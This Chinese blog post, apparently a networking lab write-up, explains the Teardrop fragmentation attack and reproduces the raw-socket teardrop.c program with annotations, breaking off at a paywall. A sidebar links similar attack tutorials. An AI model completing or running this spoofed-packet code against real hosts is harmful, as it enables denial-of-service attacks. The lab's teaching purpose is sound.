TearDrop代码编程与SOCKET应用实例

最新推荐文章于 2023-02-03 16:45:13 发布
最新推荐文章于 2023-02-03 16:45:13 发布
阅读量383 收藏 1
点赞数
分类专栏: 嵌入式系统基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/li_de_kun/article/details/110704702
版权
本文详细介绍了TearDrop攻击的原理和实现,包括编写Teardrop攻击代码及使用Wireshark抓包分析。同时,文章还探讨了SOCKET在C/S架构中的应用,包括面向连接的流式套接字示例和非阻塞的多人聊天服务器端的实现。
摘要由CSDN通过智能技术生成

TearDrop代码编程与SOCKET应用实例(wait for update)

实验环境ubuntu 18.04 server版

文章目录

TearDrop代码编程

Teardrop攻击是一种畸形报文攻击。是基于UDP的病态分片数据包的攻击方法,其工作原理是向被攻击者发送多个分片的IP包(IP分片数据包中包括该分片数据包属于哪个数据包以及在数据包中的位置等信息),某些操作系统收到含有重叠偏移的伪造分片数据包时将会出现系统崩溃、重启等现象。

实作

1.ubuntu server配置桥接模式
Ubuntu18.04 Server桥接模式的配置参考
2.编写teardrop.c

#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <string.h> 
#include <netdb.h> 
#include <netinet/in.h> 
#include <netinet/udp.h> 
#include <arpa/inet.h> 
#include <sys/types.h> 
#include <sys/time.h> 
#include <sys/socket.h> 
#include <errno.h> 

void usage(u_char *); //处理错误
u_long name_resolve(u_char *); 
u_short in_cksum(u_short *, int); 
void send_frags(int, u_long, u_long, u_short, u_short); //IP内容的设置,进行发送IP包
int main(int argc, char **argv) 
{
   
        int one = 1, count = 0, i, rip_sock; 
        u_long src_ip = 0, dst_ip = 0; //定义源IP和目的IP
        u_short src_prt = 0, dst_prt = 0;//定义源端口和目的端口
        struct in_addr addr; //定义一个in_addr对象
		printf("teardrop route|daemon9\n\n");
		/*socket(AF_INET,SOCK_RAW,IPPROTO_RAW),其原型为
		int socket(int domain, int type, int protocol);
		int domain”参数表示套接字要使用的协议簇,常用的协议簇:
		AF_UNIX(本机通信)
		AF_INET(TCP/IP – IPv4)
		AF_INET6(TCP/IP – IPv6)
		“type”参数指的是套接字类型,常用的类型有:
		SOCK_STREAM(TCP流)
		SOCK_DGRAM(UDP数据报)
		SOCK_RAW(原始套接字)
		“protocol”参数用来确定套接字使用的协议簇和类型
		一般设置为“0”,但是有时候创建原始套接字时,并不知道要使用的协议簇
		和类型,也就是domain参数未知情况下,它可以确定协议的种类。
		IPPROTO_RAW就是确定协议的类型
		当套接字创建成功时,返回套接字,失败返回“-1”。即失败就会输出错误信
		息,然后就退出程序*/
        if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 
        {
   
                fprintf(stderr, "raw socket"); 
                exit(1); 
        }
        /*setsockopt函数是用于任意类型、任意状态套接口的设置选项值,即设置套接口的选项
        setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))的原型:
        int setsockopt(int sockfd, int level, int optname, const void *optval, socklen_t optlen);
        sockfd:标识一个套接口的描述字。
        level:选项定义的层次;支持SOL_SOCKET、IPPROTO_TCP、IPPROTO_IP和IPPROTO_IPV6等。
        optname:需设置的选项。
        optval:指针,指向存放选项值的缓冲区。
        optlen:optval缓冲区长度。
        IP_HDRINCL:如果是TRUE,IP头就会随即将发送的数据一起提交,并从读取
        的数据中返回
        */
        if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))< 0) 
        {
   
                fprintf(stderr, "IP_HDRINCL"); 
                exit(1); 
        }
        //当main中传入的参数个数少于3时,就会利用处理错误函数进行输入一些信息
        if (argc < 3) usage(argv[0]);
        //通过函数name_resolve进行源IP和目的IP的设置
        if(!(src_ip=name_resolve(argv[1]))||!(dst_ip = name_resolve(argv[2]))) 
        {
   
                fprintf(stderr, "What the hell kind of IP address is that?\n"); 
                exit(1); 
        }
        /*getopt函数来解析命令行参数 
        getopt(argc, argv, "s:t:n:")的原型:
        int getopt(int argc, char * const argv[], const char *optstring);
       如果getopt函数找到一个选项字符,则返回该字符,更新外部变量optind和
       一个静态变量nextchar,以便下次调用getopt函数可以使用下一个选项字符
       或argv中 带-符号的参数恢复扫描。如果没有更多选项字符,getopt()返
       回-1。 那么optind是第一个argv中带-的参数的索引。optstring是一个包
       含合法选项字符的字符串。optarg是指向当前选项参数(如果有)的指针。
       atoi()函数 atoi()原型: 
       int atoi(const char *str ); 
       函数功能:把字符串转换成整型数,若无法转换,则返回0 */
        while ((i = getopt(argc, argv, "s:t:n:")) != EOF) 
        {
   
                switch (i) 
				{
   
                case 's': // source port
                        src_prt = (u_short)atoi(optarg); 
                        break; 
                case 't': // dest port 
                        dst_prt = (u_short)atoi(optarg); 
                        break; 
                case 'n': // number to send 
                        count = atoi(optarg); 
                        break; 
                default : 
                        usage(argv[0]);
                        break; // NOTREACHED 
                }
        }
        //通过srandom函数设置种子值
        srandom((unsigned)(utimes("0",(time_t)0))); 
        //若上面源端口的值为0,就随机生成一个随机数赋值给源端口
        if (!src_prt) src_prt = (random() % 0xffff); 
        //若上面目的端口的值为0,就随机生成一个随机数赋值给目的端口
        if (!dst_prt) dst_prt = (random() % 0xffff); 
        //发送的次数的若为0,就将设定好的COUNT值赋给count
        if (!count) count = COUNT; 
        printf("Death on flaxen wings:\n"); 
		addr.s_addr = src_ip; //给addr对象赋值
		//inet_ntoa()函数功能是将网络地址转换成“.”点隔的字符串格式
        printf("From: %15s.%5d\n", inet_ntoa(addr), src_prt); 	
        addr.s_addr = dst_ip; //给addr对象赋值
        printf(" To: %15s.%5d\n", inet_ntoa(addr), dst_prt); 
        printf(" Amt: %5d\n", count); 
        printf("[ ");
        //循环调用send_frags函数发送IP包
        for (i = 0; i < count; i++) 
        {
   
                send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); 
                printf("b00m "); 
                usleep(500); 
        }
        printf("]\n"); 
        return (0); 
}

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,u_short dst_prt) 
{
   
        u_char *packet = NULL, *p_ptr = NULL; // packet pointers(IP包指针)
        u_char byte; // a byte 
        /*套接字协议结构体
        struct sockaddr_in{
        	sa_family_in sin_family;//地址族
        	uint6_t sin_port;//16位的TCP/UDP的端口号
        	struct in_addr sin_addr;//16位的IP地址
        	char sin_zero[8];//不使用
        } 
        */
        struct sockaddr_in sin; 
		sin.sin_family = AF_INET; 
        sin.sin_port = src_prt; 
        sin.sin_addr.s_addr = dst_ip; 
        //malloc函数原型是void *malloc(size_t size),用于分配所需的内存空间,并返回一个指向它的指针
        packet = (u_char *)malloc(IPH + UDPH + PADDING); 
        //网络层IP包的设置
        p_ptr = packet; //IP包头部中版本和头部长度的设置,4表示采用IPv4,5表示头部有5行
        /*bzero函数
          原型:extern void bzero(void *s, int n);
		  用法:#include <string.h>
   		  功能:置字节字符串s的前n个字节为零。
          说明:bzero无返回值。
        */
        bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
        
        byte = 0x45; 
        /*memcpy函数
         原型:extern void *memcpy(void *dest, void *src, unsigned int count);
         用法:#include <string.h>
         功能:由src所指内存区域复制count个字节到dest所指内存区域。
         说明:src和dest所指内存区域不能重叠,函数返回指向dest的指针。*/
        memcpy(p_ptr, &byte, sizeof(u_char)); 
        p_ptr += 2; // IP包中TOS (skipped)的执行  
        *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);//IP包的总长度的设置 
        p_ptr += 2; 
        *((u_short *
最低0.47元/天 解锁文章
犹豫就会败北ldk
关注
专栏目录
Teardrop攻击初体验
CHL的博客
12-04 1817
目录一、Teardrop攻击1.Teardrop攻击介绍2.检测方法二、Teardrop程序代码编写三、参考资料 一、Teardrop攻击 1.Teardrop攻击介绍 Teardrop攻击是一种畸形报文攻击。是基于UDP的病态分片数据包的攻击方法,其工作原理是向被攻击者发送多个分片的IP包(IP分片数据包中包括该分片数据包属于哪个数据包以及在数据包中的位置等信息),某些操作系统收到含有重叠偏移的伪造分片数据包时将会出现系统崩溃、重启等现象。 2.检测方法 对接收到的分片数据包进行分析,计算数据包的片偏移量
产生虚假的用于欺骗的IP数据包程序实践——Teardrop
clyrjj的博客
12-04 944
文章目录一、协议与原理二、实验三、小结与参考链接 一、协议与原理 IP协议 IP协议是网络中最繁忙的协议。IP协议是一种best efforts协议,不保证可靠性,数据包可能重复、丢失;无连接协议,同一个连接中的多个报文被独立对待。IP协议主要定义了数据传送的基本单位;执行路由功能;主要规定了主机和路由器应该如何处理数据包;在什么情况下产生错误信息;以及什么情况下应该丢弃数据包。 IPV4的报头格式 下面详细描述ipv4报头中各个字段的含义: ·Version(版本): 该字段长度为4比特位。标识I
Socket实战——Teardrop代码编程
explain_sin的博客
12-03 301
目录准备阶段抓包验证参考资料 准备阶段 将虚拟机网络适配器的连接模式更改为桥接模式 进入虚拟机,创建一个名为Teardrop(泪滴攻击)的文件,并输入以下代码 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <net
Teardrop攻击--伪造虚假的IP数据包发送并抓取及完成简易静态网页
qq_48008050的博客
12-04 4564
目录一、相关介绍1.IP协议2.Teardrop攻击二、编写Teardrop程序(伪造一个虚假地址的IP包)三、参考链接 一、相关介绍 1.IP协议 IP是Internet Protocol(网际互连协议)的缩写,是TCP/IP体系中的网络层协议。设计IP的目的是提高网络的可扩展性:一是解决互联网问题,实现大规模、异构网络的互联互通;二是分割顶层网络应用和底层网络技术之间的耦合关系,以利于两者的独立发展。根据端到端的设计原则,IP只为主机提供一种无连接、不可靠的、尽力而为的数据包传输服务。 目前普遍使用的
Kali linux 学习笔记(七十五)拒绝服务——teardrop 2020.4.15
闵行小鱼塘
04-15 932
本节学习teardrop,也是很古老的,利用IP分段偏移
C语言 socket编程实例
dyhchuan1的博客
12-05 3368
C语言 socket编程实例一. 面向连接的流式套接字 C/S 例子二. 非阻塞的多人聊天服务器端例子三. 简单的 IPv6 UDP socket编程 一. 面向连接的流式套接字 C/S 例子 在树莓派下,新建一个 Server1.c,命令 nano Server1.c,然后写入如下内容 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #incl
SOCKET应用实例之面向连接的流式套接字C/S与非阻塞的多人聊天服务器,并且同时兼容IPv4和IPv6(Ubuntu与树莓派之间测试)
clyrjj的博客
12-13 726
文章目录一、套接口的三种类型二、流式套接口的工作原理三、面向连接的流式套接字 C/S 例子四、非阻塞的多人聊天服务器五、IPv6 UDP socket编程并进行抓包验证六、总结七、参考 一、套接口的三种类型 1、 套接口有三种类型:流式(面向连接)套接口、数据报(无连接)套接口及原始(IP)套接口。在我之前的博客中曾介绍了原始套接口的TearDrop网络攻击程序 2、 那么流式套接口是定义了一种可靠的面向连接的服务,实现了无差错无重复的顺序数据传输。 数据报套接口定义了一种无连接的服务,数据报通过相互独立的
Socket编程实战
yqpgalvzm的博客
12-05 145
一、wireshark抓包分析TCP协议 二、Teardrop代码编程 1.新建文件 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/udp.h> #include <arpa/inet.h
socket编程实战
iostreamhvoid的博客
12-05 213
Teardrop攻击——发送虚假IP包信息一、原始套接字概述二、Teardrop攻击原理阐述三、编写Teardrop程序(伪造一个虚假地址的IP包)四、参考链接 一、原始套接字概述 二、Teardrop攻击原理阐述 三、编写Teardrop程序(伪造一个虚假地址的IP包) 四、参考链接 ...
原始套接字编程:Teardrop伪造IP包
weixin_45189408的博客
12-07 659
目录原始套接字概述功能含义原始套接字和标准套接字的区别Teardrop伪造IP包Teardrop 攻击原理Teardrop 防御方法编写teardrop代码 原始套接字 概述 raw socket,即原始套接字,可以接收本机网卡上的数据帧或者数据包,对于监听网络的流量和分析是很有作用的,一共可以有4种方式创建这种socket。 1.socket(PF_INET, SOCK_RAW, IPPROTO_TCP|IPPROTO_UDP|IPPROTO_ICMP)发送接收ip数据包 2.socket(PF_PAC
Teardrop代码编程,创建虚假包
qq_45931327的博客
12-05 265
Teardrop代码编程 Teardrop代码编程,伪造一个虚假地址的IP包,包的内容填入Fake News。发送此包。并用wireshark抓包进行验证。
什么是Teardrop攻击?我们要如何防御Teardrop攻击?
驰网云儿
11-13 6175
Teardrop攻击是一种拒绝服务攻击,是一种基于UDP的病态分片数据包的攻击方法,英文“Tear”是“眼泪”的意思,“drop”是“掉落”的意思,顾名思义,Teardrop攻击是一种令人落泪的攻击手段,可见其破坏威力很强大 主要针对早期微软操作系统(95、98、3.x、nt)近些年有人发现对 2.x 版本的安卓系统、6.0 IOS 系统攻击有效 攻击效果 被攻击者会出现蓝屏、重启、卡死等情况 1、Teardrop攻击原理 Teardrop攻击工作原理是攻击者A给受害者B发送一些分片I..
渗透测试-----9-拒绝服务(黑客其它的攻击方式)
最新发布
weixin_62693307的博客
02-03 2058
Flood攻击原理相悖,它正是利用建立TCP/IP三次握手连接来实现拒绝服务攻击,而且与Syn-Flood不同它并非通过耗尽服务器的TCP连接数来让正常用户的正常请求无法响应,而是直接耗尽服务端的内存、CPU等资源让受害者宕机,属于非对称的资源消耗攻击,这种攻击方式的危害性极大,而且一旦遭受分布式攻击是几乎不能被抵御的。SYN Flood利用TCP协议缺陷,它通过一定的操作破坏TCP三次握手建立正常连接,占用并耗费系统资源,使得被攻击方资源耗尽,无法及时回应或初一正常的服务请求。
【无标题】常见攻击构造方法
qq_37460687的博客
08-31 1011
攻击,hping3
原始套接字编程——Teardrop
Harriet的博客
11-27 973
文章目录一、介绍套接字二、 一、介绍套接字 流套接字(SOCK_STREAM) 用于提供面向连接、可靠的数据传输服务。使用TCP协议。 数据报套接字(SOCK_DGRAM) 提供一种无连接的服务,不能够保证数据传输的可靠性,可能出现数据的丢失情况。使用UDP协议。 原始套接字(SOCK_RAW) 可以内核没有处理的IP数据包,用于处理其他协议(除TCP、UDP之外)发送的数据。 本文章主要讲述使用原始套接字进行处理数据 二、 ...
C源码:常用攻击程序
zerray's
06-09 1904
 这些代码初学者用来研究下也不错,这里有一些是老的,现在看来并没有用,但他们都很有名。 1 Land 攻击一台Win95的机器。这是Win95的一个漏洞,以其IP地址和端口向自 己的同一个端口发起连接(发SYN),Win95即会崩溃。 /* land.c by m3lt, FLC crashes a win95 box */ #include #include #include #inclu
Teardrop代码编程,伪造一个虚假地址的IP包和SOCKET应用实例
zidingyidingyi的博客
12-05 730
Teardrop攻击是一种畸形报文攻击。原理是向攻击者发送的多个分片的IP包,由于操作系统会将分开的IP包重新组合,系统收到偏移量错误IP包然后组合,导致数据异常。 实验代码:为“网络编程技术”参考书上 “2.11 原始套接字编程”中的Teardrop代码编程。 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <netdb.h&
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值